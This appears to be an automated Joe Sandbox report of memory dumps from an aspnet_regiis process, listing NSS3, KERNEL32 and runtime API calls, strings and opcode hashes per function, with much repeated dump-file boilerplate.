Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: *El
API String ID: 1595327144-3616494707
Opcode ID: 5665042c74a8d4f5d253d977805ccaa1d3fe4af41bdac2d34b2d493f412834f8
Instruction ID: 853e64000082a8eac28c3310c1912cd02a179551ad2bdbe380302b4f934df689
Opcode Fuzzy Hash: 5665042c74a8d4f5d253d977805ccaa1d3fe4af41bdac2d34b2d493f412834f8
Instruction Fuzzy Hash: 94313CF4601611DFD704CF25D980E62B7E8FF48359F2585A9E80A8FB56E730E805CBA1

Function 6C49A800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C367915,?,?), ref: 6C49A86D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C367915,?,?), ref: 6C49A8A6

Strings

database corruption, xrefs: 6C49A89B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C49A891
%s at line %d of [%.10s], xrefs: 6C49A8A0

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 09a59509ca1cac15701dc00190892a532397c6808acce7049655fe5a2d59ea61
Instruction ID: d9b57827dc998f3b83fb0fbd738cfc9a1e9ec22ef078a9078942707e6eeeedcd
Opcode Fuzzy Hash: 09a59509ca1cac15701dc00190892a532397c6808acce7049655fe5a2d59ea61
Instruction Fuzzy Hash: 9C110371A00224ABDB05CF21DC51EAABBA1FF89354F004428FD194BB80EB34E916CB96

Function 6C3B0DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C3B0BDE), ref: 6C3B0DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C3B0BDE), ref: 6C3B0DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C3B0BDE), ref: 6C3B0DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C3B0BDE), ref: 6C3B0E32

Strings

%s incr => %d (find lib), xrefs: 6C3B0E2D

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: cdfd5a769dc4f95a0ab42e27f3c9dde93265271c135a5b798709a59a0c09f7a2
Instruction ID: 5ea1d36ebd766b35fd66280b07d7ef715310b9339b12d3cba955db9be5277080
Opcode Fuzzy Hash: cdfd5a769dc4f95a0ab42e27f3c9dde93265271c135a5b798709a59a0c09f7a2
Instruction Fuzzy Hash: 0D0128B17006149FE610DF24DC45E17B3ECDB45618B06446DE905E3E41E762FC148AE1

Function 6C46AC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]El,00000000,?,?,6C446AC6,?), ref: 6C46AC2D

Part of subcall function 6C40ADC0: TlsGetValue.KERNEL32(?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AE10
Part of subcall function 6C40ADC0: EnterCriticalSection.KERNEL32(?,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AE24
Part of subcall function 6C40ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C3ED079,00000000,00000001), ref: 6C40AE5A
Part of subcall function 6C40ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AE6F
Part of subcall function 6C40ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AE7F
Part of subcall function 6C40ADC0: TlsGetValue.KERNEL32(?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AEB1
Part of subcall function 6C40ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C3ECDBB,?,6C3ED079,00000000,00000001), ref: 6C40AEC9

PK11_FreeSymKey.NSS3(?,@]El,00000000,?,?,6C446AC6,?), ref: 6C46AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]El,00000000,?,?,6C446AC6,?), ref: 6C46AC59
free.MOZGLUE(8CB6FF01,6C446AC6,?,?,?,?,?,?,?,?,?,?,6C455D40,00000000,?,6C45AAD4), ref: 6C46AC62

Strings

@]El, xrefs: 6C46AC05

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]El
API String ID: 1595327144-389983473
Opcode ID: 720c7b4098b10b455887f67382058ea0a96c6cf25941e0d29a09efd11ab554e5
Instruction ID: f4e39dbb276f90a59d3748feca0c0372cee260b4af29e034d1b79b57611a2ff8
Opcode Fuzzy Hash: 720c7b4098b10b455887f67382058ea0a96c6cf25941e0d29a09efd11ab554e5
Instruction Fuzzy Hash: 2F018BB56006109FDB00CF15E8C4F46B7E8EF04B5DF188068E9498FB0AD731E808CBA1

Function 6C342940 Relevance: 7.8, APIs: 6, Instructions: 327stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C341360,00000000), ref: 6C342A19
memcpy.VCRUNTIME140(?,00000009,00000034,?,?,?,6C341360,00000000), ref: 6C342A45
memcpy.VCRUNTIME140(?,00000000,00000000), ref: 6C342A7C

Part of subcall function 6C342D50: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,3B4C37C4,?,?,00000000,?,6C34296E), ref: 6C342DA4

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C342AF3
memcpy.VCRUNTIME140(?,00000009,0000000C,?,?,?,6C341360,00000000), ref: 6C342B71
memset.VCRUNTIME140(00000000,00000000,00000034), ref: 6C342B90

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: memcpystrlen$memset
String ID:
API String ID: 638109778-0
Opcode ID: e02eb450e2b3cd8cf0511550e771f27907b182d3137c38ba20d49675e895cc46
Instruction ID: 40668b5d859514e30d971bf986f8b84d3c0508003fa78fac988d7ec9eb2873ee
Opcode Fuzzy Hash: e02eb450e2b3cd8cf0511550e771f27907b182d3137c38ba20d49675e895cc46
Instruction Fuzzy Hash: F6C19171E012068BEB04CF69C994BAAB7E5AF88318F158229D915EB741D732E841CFE1

Function 6C35A910 Relevance: 7.7, APIs: 5, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eb21fa41620cd7ecec9d354ea9942d951fe98d1f5ab448407092fa7ec964294
Instruction ID: 8e250567a948fa58d90f42545530424686722d16edb8d8d9ca2d73562e127963
Opcode Fuzzy Hash: 2eb21fa41620cd7ecec9d354ea9942d951fe98d1f5ab448407092fa7ec964294
Instruction Fuzzy Hash: 9591AF75A002048FEB08DF64DC89F7B77B5BF46308F46002DD5464BA40DB3AA995DFA5

Function 6C3BEDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C3BEDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C3BEE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C3BEECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C3BEEEB
free.MOZGLUE(?), ref: 6C3BEEF6

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 2e7045b8c5f1e6beb3804c471a103c384997b23e6e090f05a4bf5d2e2ff7deb9
Instruction ID: 3511c66fd8260a464382f8e9a654053dd0727d32dc1d0bebb673d9de92cf89ba
Opcode Fuzzy Hash: 2e7045b8c5f1e6beb3804c471a103c384997b23e6e090f05a4bf5d2e2ff7deb9
Instruction Fuzzy Hash: 1B31C1B5A003009BE7209F2CCC45B667BF4FB56319F150568E85AA7E50E732E814CFE5

Function 6C3CAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C3C3FFF,00000000,?,?,?,?,?,6C3C1A1C,00000000,00000000), ref: 6C3CADA7

Part of subcall function 6C4214C0: TlsGetValue.KERNEL32 ref: 6C4214E0
Part of subcall function 6C4214C0: EnterCriticalSection.KERNEL32 ref: 6C4214F5
Part of subcall function 6C4214C0: PR_Unlock.NSS3 ref: 6C42150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C3C3FFF,00000000,?,?,?,?,?,6C3C1A1C,00000000,00000000), ref: 6C3CADB4

Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C4210F3
Part of subcall function 6C4210C0: EnterCriticalSection.KERNEL32(?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42110C
Part of subcall function 6C4210C0: PL_ArenaAllocate.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421141
Part of subcall function 6C4210C0: PR_Unlock.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421182
Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C3C3FFF,?,?,?,?,6C3C3FFF,00000000,?,?,?,?,?,6C3C1A1C,00000000), ref: 6C3CADD5

Part of subcall function 6C41FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C418D2D,?,00000000,?), ref: 6C41FB85
Part of subcall function 6C41FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C41FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C4E94B0,?,?,?,?,?,?,?,?,6C3C3FFF,00000000,?), ref: 6C3CADEC

Part of subcall function 6C41B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4F18D0,?), ref: 6C41B095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3C3FFF), ref: 6C3CAE3C

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: 368c8f860831fdfda23b7847fd0eadaef4206075acc72ea86f6e69e61d32c24d
Instruction ID: 52eb8c404d83e0a0fffe0368de304fc5eff2d163d6a9ad0cb24aaa7c0a830c34
Opcode Fuzzy Hash: 368c8f860831fdfda23b7847fd0eadaef4206075acc72ea86f6e69e61d32c24d
Instruction Fuzzy Hash: C9113072F002042BE710DB659C05FBF72B89F9524CF00422CEC5996A41FB22ED488AE3

Function 6C418800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C42085A,00000000,?,6C3C8369,?), ref: 6C418821
TlsGetValue.KERNEL32(?,?,6C42085A,00000000,?,6C3C8369,?), ref: 6C41883D
EnterCriticalSection.KERNEL32(?,?,?,6C42085A,00000000,?,6C3C8369,?), ref: 6C418856
PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C418887
PR_Unlock.NSS3(?,?,?,?,6C42085A,00000000,?,6C3C8369,?), ref: 6C418899

Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07AD
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07CD
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C34204A), ref: 6C3B07D6
Part of subcall function 6C3B07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C34204A), ref: 6C3B07E4
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,6C34204A), ref: 6C3B0864
Part of subcall function 6C3B07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C3B0880
Part of subcall function 6C3B07A0: TlsSetValue.KERNEL32(00000000,?,?,6C34204A), ref: 6C3B08CB
Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(?,?,6C34204A), ref: 6C3B08D7
Part of subcall function 6C3B07A0: TlsGetValue.KERNEL32(?,?,6C34204A), ref: 6C3B08FB

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID:
API String ID: 2759447159-0
Opcode ID: 31573583422d07e2d63647d0f77ca4672a12ff0b613fef56f623058bada7e4be
Instruction ID: 0a700204d783ddbd47a394e3be74ddc39918e77e0bce3ddc96760fc071d65dbf
Opcode Fuzzy Hash: 31573583422d07e2d63647d0f77ca4672a12ff0b613fef56f623058bada7e4be
Instruction Fuzzy Hash: E3216BB4908605CFDB00EF78C984D6ABBF4FF06309F12466ADC9496B05E730E895CB92

Function 6C3E28A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C3D80DD), ref: 6C3E28BA
EnterCriticalSection.KERNEL32(?,?,?,?,6C3D80DD), ref: 6C3E28D3
PR_Unlock.NSS3(?,?,?,?,?,6C3D80DD), ref: 6C3E28E8
DeleteCriticalSection.KERNEL32(?,?,?,?,?,6C3D80DD), ref: 6C3E290E
free.MOZGLUE(?,?,?,?,?,?,6C3D80DD), ref: 6C3E291A

Part of subcall function 6C3D9270: DeleteCriticalSection.KERNEL32(?,?,6C3E5089,?,6C3E3B70,?,?,?,?,?,6C3E5089,6C3DF39B,00000000), ref: 6C3D927F
Part of subcall function 6C3D9270: free.MOZGLUE(?,?,6C3E3B70,?,?,?,?,?,6C3E5089,6C3DF39B,00000000), ref: 6C3D9286
Part of subcall function 6C3D9270: PL_HashTableDestroy.NSS3(?,6C3E3B70,?,?,?,?,?,6C3E5089,6C3DF39B,00000000), ref: 6C3D9292

Part of subcall function 6C3D8B50: TlsGetValue.KERNEL32(00000000,?,6C3E0948,00000000), ref: 6C3D8B6B
Part of subcall function 6C3D8B50: EnterCriticalSection.KERNEL32(?,?,?,6C3E0948,00000000), ref: 6C3D8B80
Part of subcall function 6C3D8B50: PL_FinishArenaPool.NSS3(?,?,?,?,6C3E0948,00000000), ref: 6C3D8B8F
Part of subcall function 6C3D8B50: PR_Unlock.NSS3(?,?,?,?,6C3E0948,00000000), ref: 6C3D8BA1
Part of subcall function 6C3D8B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6C3E0948,00000000), ref: 6C3D8BAC
Part of subcall function 6C3D8B50: free.MOZGLUE(?,?,?,?,?,6C3E0948,00000000), ref: 6C3D8BB8

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
String ID:
API String ID: 3225375108-0
Opcode ID: 5baab514255060a5f908cf540736d479b63ae338c26f90ab24589181d28372c6
Instruction ID: 76011e1616d96f66881b3c70b254b63a3096c34d8b15ad25e9c7f6faedd481c5
Opcode Fuzzy Hash: 5baab514255060a5f908cf540736d479b63ae338c26f90ab24589181d28372c6
Instruction Fuzzy Hash: 65212AB56046168BCB00AF78C589459BBF4BF09314F024929D8D597B00EB35F894CF92

Function 6C3D8FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C3E0710), ref: 6C3D8FF1
PR_CallOnce.NSS3(6C522158,6C3D9150,00000000,?,?,?,6C3D9138,?,6C3E0710), ref: 6C3D9029
calloc.MOZGLUE(00000001,00000000,?,?,6C3E0710), ref: 6C3D904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C3E0710), ref: 6C3D9066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C3E0710), ref: 6C3D9078

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: 6549b9e4be361866b79bf6e5ba8b1e01cc0561b2fa840b49e19642c36fa4e499
Instruction ID: d73c61c1cc84f5192cd858ca5aec144a363538a32a77b504d48cfcdefdd7739b
Opcode Fuzzy Hash: 6549b9e4be361866b79bf6e5ba8b1e01cc0561b2fa840b49e19642c36fa4e499
Instruction Fuzzy Hash: FB11293270121557EB101E69BC64EA632ACEB8176CF420035FD44C6B40FB57EC448BE5

Function 6C3ECD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C401E10: TlsGetValue.KERNEL32 ref: 6C401E36
Part of subcall function 6C401E10: EnterCriticalSection.KERNEL32(?,?,?,6C3DB1EE,2404110F,?,?), ref: 6C401E4B
Part of subcall function 6C401E10: PR_Unlock.NSS3 ref: 6C401E76

free.MOZGLUE(?,6C3ED079,00000000,00000001), ref: 6C3ECDA5
PK11_FreeSymKey.NSS3(?,6C3ED079,00000000,00000001), ref: 6C3ECDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C3ED079,00000000,00000001), ref: 6C3ECDCF
DeleteCriticalSection.KERNEL32(?,6C3ED079,00000000,00000001), ref: 6C3ECDE2
free.MOZGLUE(?), ref: 6C3ECDE9

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: a5f5688a53b54cb2f95027f35b44e3362d64bce587cbaca24e033720a7a82e8e
Instruction ID: 44a6cd9109ddf19d1d4f5d022b4bf3cf1aa8a47b70bf527c3ea223c916f3a286
Opcode Fuzzy Hash: a5f5688a53b54cb2f95027f35b44e3362d64bce587cbaca24e033720a7a82e8e
Instruction Fuzzy Hash: C011A3B2B41121ABDA00EB65FC45D9BBB6CFF082697110132E90987E01D733F424CBD1

Function 6C452CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C455B40: PR_GetIdentitiesLayer.NSS3 ref: 6C455B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C452CEC

Part of subcall function 6C46C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C46C2BF

PR_EnterMonitor.NSS3(?), ref: 6C452D02
PR_EnterMonitor.NSS3(?), ref: 6C452D1F
PR_ExitMonitor.NSS3(?), ref: 6C452D42
PR_ExitMonitor.NSS3(?), ref: 6C452D5B

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
